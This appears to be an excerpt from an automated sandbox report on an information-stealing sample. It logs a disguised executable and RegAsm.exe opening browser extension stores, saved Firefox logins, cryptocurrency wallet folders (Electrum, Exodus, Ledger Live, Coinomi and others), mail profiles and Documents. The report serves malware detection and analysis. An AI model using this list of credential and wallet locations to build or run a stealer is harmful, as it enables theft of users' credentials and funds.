                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.jsonJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAG
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAG
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSB
